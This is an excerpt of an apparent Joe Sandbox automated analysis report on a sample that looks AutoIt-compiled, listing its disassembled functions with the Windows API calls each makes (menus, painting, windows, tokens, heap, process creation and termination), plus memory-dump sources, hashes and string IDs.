                    • Instruction Fuzzy Hash: 55515BB5A00249DFCB14DF58D884EAAB7B9FF48314B158169ED59DB310D734E911CBA0
                    APIs
                    • _memset.LIBCMT ref: 007A2747
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2792
                    • IsMenu.USER32(00000000), ref: 007A27B2
                    • CreatePopupMenu.USER32 ref: 007A27E6
                    • GetMenuItemCount.USER32(000000FF), ref: 007A2844
                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007A2875
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                    • String ID:
                    • API String ID: 3311875123-0
                    • Opcode ID: 5c24e153475812e1f53c2d6f276c8cd4948a55222f544fff38585d85d50cc03a
                    • Instruction ID: 0b5b9fc11ab283e443d981332fe552fca385094ab1a32987e463f071f9cad9b8
                    • Opcode Fuzzy Hash: 5c24e153475812e1f53c2d6f276c8cd4948a55222f544fff38585d85d50cc03a
                    • Instruction Fuzzy Hash: 6A51AF70A00205EFDF24CF6CD988AAEBBF5AF86314F104369F8119B292D77C9906CB51
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                    • BeginPaint.USER32(?,?,?,?,?,?), ref: 0074179A
                    • GetWindowRect.USER32(?,?), ref: 007417FE
                    • ScreenToClient.USER32(?,?), ref: 0074181B
                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0074182C
                    • EndPaint.USER32(?,?), ref: 00741876
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: PaintWindow$BeginClientLongRectScreenViewport
                    • String ID:
                    • API String ID: 1827037458-0
                    • Opcode ID: 11b883745224dca8f0573ef2a92cc220d6f22ec6cb88ca08460b13ff57a71b9e
                    • Instruction ID: 7998233bbb3046e8145ec00bae823af131333d7f4eb8426c47a036d688eca060
                    • Opcode Fuzzy Hash: 11b883745224dca8f0573ef2a92cc220d6f22ec6cb88ca08460b13ff57a71b9e
                    • Instruction Fuzzy Hash: 9E419D70200201AFD711EF24CC88FB67BE9FB49734F048669F9A4861A1D7399895DB61
                    APIs
                    • ShowWindow.USER32(008067B0,00000000,01685788,?,?,008067B0,?,007CB862,?,?), ref: 007CB9CC
                    • EnableWindow.USER32(00000000,00000000), ref: 007CB9F0
                    • ShowWindow.USER32(008067B0,00000000,01685788,?,?,008067B0,?,007CB862,?,?), ref: 007CBA50
                    • ShowWindow.USER32(00000000,00000004,?,007CB862,?,?), ref: 007CBA62
                    • EnableWindow.USER32(00000000,00000001), ref: 007CBA86
                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 007CBAA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$Show$Enable$MessageSend
                    • String ID:
                    • API String ID: 642888154-0
                    • Opcode ID: 97668e55cde857a477091ecd7bd80bf0b75529678a3909af162a620a2064a2af
                    • Instruction ID: 6cd250efac2e6801d9a871c9c36a35bb2f0ba250135c1fc755558817ecc1369e
                    • Opcode Fuzzy Hash: 97668e55cde857a477091ecd7bd80bf0b75529678a3909af162a620a2064a2af
                    • Instruction Fuzzy Hash: 6E413034600641EFDB25CF64C48AF997BE1BB05314F1882BDFA499F6A2C73AE845CB51
                    APIs
                    • GetForegroundWindow.USER32(?,?,?,?,?,?,007B5134,?,?,00000000,00000001), ref: 007B73BF
                      • Part of subcall function 007B3C94: GetWindowRect.USER32(?,?), ref: 007B3CA7
                    • GetDesktopWindow.USER32 ref: 007B73E9
                    • GetWindowRect.USER32(00000000), ref: 007B73F0
                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007B7422
                      • Part of subcall function 007A54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007A555E
                    • GetCursorPos.USER32(?), ref: 007B744E
                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007B74AC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                    • String ID:
                    • API String ID: 4137160315-0
                    • Opcode ID: 9b5a6ee37486dfaa52f935e750f73c5e65d835f74c1b819d5c0c642c5425b99a
                    • Instruction ID: e90308b04508060461cf15bd6784f81bf477bc56addb18a4f0039d1166592298
                    • Opcode Fuzzy Hash: 9b5a6ee37486dfaa52f935e750f73c5e65d835f74c1b819d5c0c642c5425b99a
                    • Instruction Fuzzy Hash: 1A31F432508345ABD724DF14D849F9BBBAAFFC8304F004929F58997191CA34EA08CB92
                    APIs
                      • Part of subcall function 007985F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00798608
                      • Part of subcall function 007985F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00798612
                      • Part of subcall function 007985F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00798621
                      • Part of subcall function 007985F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00798628
                      • Part of subcall function 007985F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079863E
                    • GetLengthSid.ADVAPI32(?,00000000,00798977), ref: 00798DAC
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00798DB8
                    • HeapAlloc.KERNEL32(00000000), ref: 00798DBF
                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00798DD8
                    • GetProcessHeap.KERNEL32(00000000,00000000,00798977), ref: 00798DEC
                    • HeapFree.KERNEL32(00000000), ref: 00798DF3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                    • String ID:
                    • API String ID: 3008561057-0
                    • Opcode ID: 7d78e92ef06a1986e89726b1310d98ad2ecbf7c266d619fda7124704a3527862
                    • Instruction ID: 508dfecba419bc5a1955d00cb68ec04a0b7943749169d11430820db7f579405c
                    • Opcode Fuzzy Hash: 7d78e92ef06a1986e89726b1310d98ad2ecbf7c266d619fda7124704a3527862
                    • Instruction Fuzzy Hash: C011E131600604FFDF549F64EC09FAE7B6AEF4A315F14802EE84597251CB3A9D40CB65
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00798B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00798B31
                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00798B40
                    • CloseHandle.KERNEL32(00000004), ref: 00798B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00798B7A
                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00798B8E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 1413079979-0
                    • Opcode ID: 355c798f58f62954bb6bd0bde963a3d4fe0eb0a4ac6b7e9313d7c2aa4d3d792a
                    • Instruction ID: cc28a529230bacdd680ac1e5558e72dc8e4f383e61aefcc6f3ac3495f31cf008
                    • Opcode Fuzzy Hash: 355c798f58f62954bb6bd0bde963a3d4fe0eb0a4ac6b7e9313d7c2aa4d3d792a
                    • Instruction Fuzzy Hash: EC112CB2501249ABDF01CFA4ED49FDE7BAAFF49704F084069FE04A2160C77A9D649B61
                    APIs
                      • Part of subcall function 007412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0074134D
                      • Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074135C
                      • Part of subcall function 007412F3: BeginPath.GDI32(?), ref: 00741373
                      • Part of subcall function 007412F3: SelectObject.GDI32(?,00000000), ref: 0074139C
                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007CC1C4
                    • LineTo.GDI32(00000000,00000003,?), ref: 007CC1D8
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CC1E6
                    • LineTo.GDI32(00000000,00000000,?), ref: 007CC1F6
                    • EndPath.GDI32(00000000), ref: 007CC206
                    • StrokePath.GDI32(00000000), ref: 007CC216
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                    • String ID:
                    • API String ID: 43455801-0
                    • Opcode ID: 4efc129cc4bf99825e54f3c89debcc26fa4a63ab8f894e1caf9a92ca283a9bfa
                    • Instruction ID: bc9f277f5b2fa0496b97221c5a633e913b4a864b100d156cb8ec4df21e9bd4ad
                    • Opcode Fuzzy Hash: 4efc129cc4bf99825e54f3c89debcc26fa4a63ab8f894e1caf9a92ca283a9bfa
                    • Instruction Fuzzy Hash: FA111B7640010CBFDF129F90DC88FAA7FADFB08354F048029FA189A161D7759DA5DBA0
                    APIs
                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007603D3
                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 007603DB
                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007603E6
                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007603F1
                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 007603F9
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00760401
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Virtual
                    • String ID:
                    • API String ID: 4278518827-0
                    • Opcode ID: 5529f75d7a6b3cd75b4a604ba21a46c43238f385dd926afb38c93e4185e5e001
                    • Instruction ID: 7c72e4cc83a71e60546b4ddd755dce747b71ac33224df5f9c8ceeb27f9176874
                    • Opcode Fuzzy Hash: 5529f75d7a6b3cd75b4a604ba21a46c43238f385dd926afb38c93e4185e5e001
                    • Instruction Fuzzy Hash: 440148B0901759BDE3008F5A8C85A52FFA8FF19354F00411BE15847941C7B5A864CBE5
                    APIs
                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007A569B
                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007A56B1
                    • GetWindowThreadProcessId.USER32(?,?), ref: 007A56C0
                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A56CF
                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A56D9
                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007A56E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                    • String ID:
                    • API String ID: 839392675-0
                    • Opcode ID: 16fea4d1bbfe8a5ab494583a21018baee700417d38f9f40824520c181d666208
                    • Instruction ID: 47a249ca35835e095d4be32aa2359b52127ef4a131c0545b284ea7a85121d192
                    • Opcode Fuzzy Hash: 16fea4d1bbfe8a5ab494583a21018baee700417d38f9f40824520c181d666208
                    • Instruction Fuzzy Hash: 6AF03032241558BBE7215BA2DC0DEEF7F7DEFC6B11F04416DFA04E1050D7A91A0186B9
                    APIs
                    • InterlockedExchange.KERNEL32(?,?), ref: 007A74E5
                    • EnterCriticalSection.KERNEL32(?,?,00751044,?,?), ref: 007A74F6
                    • TerminateThread.KERNEL32(00000000,000001F6,?,00751044,?,?), ref: 007A7503
                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00751044,?,?), ref: 007A7510
                      • Part of subcall function 007A6ED7: CloseHandle.KERNEL32(00000000,?,007A751D,?,00751044,?,?), ref: 007A6EE1
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007A7523
                    • LeaveCriticalSection.KERNEL32(?,?,00751044,?,?), ref: 007A752A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                    • String ID:
                    • API String ID: 3495660284-0
                    • Opcode ID: 78e1abb270d4064ce1a86a5bcca936b07edb7167744caf2224b73753873c5d1e
                    • Instruction ID: 3147cce728af5b7c4b370b43b2d3f4298667349ebdd8eb65a3eb7e24aa457189
                    • Opcode Fuzzy Hash: 78e1abb270d4064ce1a86a5bcca936b07edb7167744caf2224b73753873c5d1e
                    • Instruction Fuzzy Hash: 08F03A3A544612EBDB161B64EC8CDEE772AFF45302B04463AF202910A0CB795811CA54
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00798E7F
                    • UnloadUserProfile.USERENV(?,?), ref: 00798E8B
                    • CloseHandle.KERNEL32(?), ref: 00798E94
                    • CloseHandle.KERNEL32(?), ref: 00798E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00798EA5
                    • HeapFree.KERNEL32(00000000), ref: 00798EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                    • String ID:
                    • API String ID: 146765662-0
                    • Opcode ID: b2ca2e09e2ca254eb1686e887b3966bcc6a03551158cc9da49719b017fac04b3
                    • Instruction ID: 9fb6c19a1b5142b2a27ed841e2c9f7799956dafae32b7ede7bc083ba5f41278d
                    • Opcode Fuzzy Hash: b2ca2e09e2ca254eb1686e887b3966bcc6a03551158cc9da49719b017fac04b3
                    • Instruction Fuzzy Hash: 4EE0C236004805FBDA011FE2EC0CD0ABF6AFB89322B54823AF21981070CB3A9820DB58
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,007D2C7C,?), ref: 00797C32
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,007D2C7C,?), ref: 00797C4A
                    • CLSIDFromProgID.OLE32(?,?,00000000,007CFB80,000000FF,?,00000000,00000800,00000000,?,007D2C7C,?), ref: 00797C6F
                    • _memcmp.LIBCMT ref: 00797C90
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FromProg$FreeTask_memcmp
                    • String ID: ,,}
                    • API String ID: 314563124-3650289849
                    • Opcode ID: 6a04a984a4e08478d6bad451372fd00e402ecc5899a21f99576a0c2adebb8194
                    • Instruction ID: fb1a40c762a44753fa4d40c33ae263ed656e63f1ff20877c2f070da21900759b
                    • Opcode Fuzzy Hash: 6a04a984a4e08478d6bad451372fd00e402ecc5899a21f99576a0c2adebb8194
                    • Instruction Fuzzy Hash: 98810A71A10109EFCF04DF94C988EEEB7B9FF89315F204198E506AB250DB75AE06CB60
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007B8928
                    • CharUpperBuffW.USER32(?,?), ref: 007B8A37
                    • VariantClear.OLEAUT32(?), ref: 007B8BAF
                      • Part of subcall function 007A7804: VariantInit.OLEAUT32(00000000), ref: 007A7844
                      • Part of subcall function 007A7804: VariantCopy.OLEAUT32(00000000,?), ref: 007A784D
                      • Part of subcall function 007A7804: VariantClear.OLEAUT32(00000000), ref: 007A7859
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                    • API String ID: 4237274167-1221869570
                    • Opcode ID: 6bd1fc222a717aad3bd8fd9ac1ebe95352cf60ca16640127c5652c03924df7fd
                    • Instruction ID: 825d1761ffb048bb71b2fdf9af20bf101a3dac3155f5cdf6298e35a08e743ab5
                    • Opcode Fuzzy Hash: 6bd1fc222a717aad3bd8fd9ac1ebe95352cf60ca16640127c5652c03924df7fd
                    • Instruction Fuzzy Hash: D69182B1604301DFCB54DF24C484A9BBBE8EF89354F04896EF99A8B361DB35E905CB52
                    APIs
                      • Part of subcall function 0075FEC6: _wcscpy.LIBCMT ref: 0075FEE9
                    • _memset.LIBCMT ref: 007A3077
                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A30A6
                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007A3159
                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007A3187
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                    • String ID: 0
                    • API String ID: 4152858687-4108050209
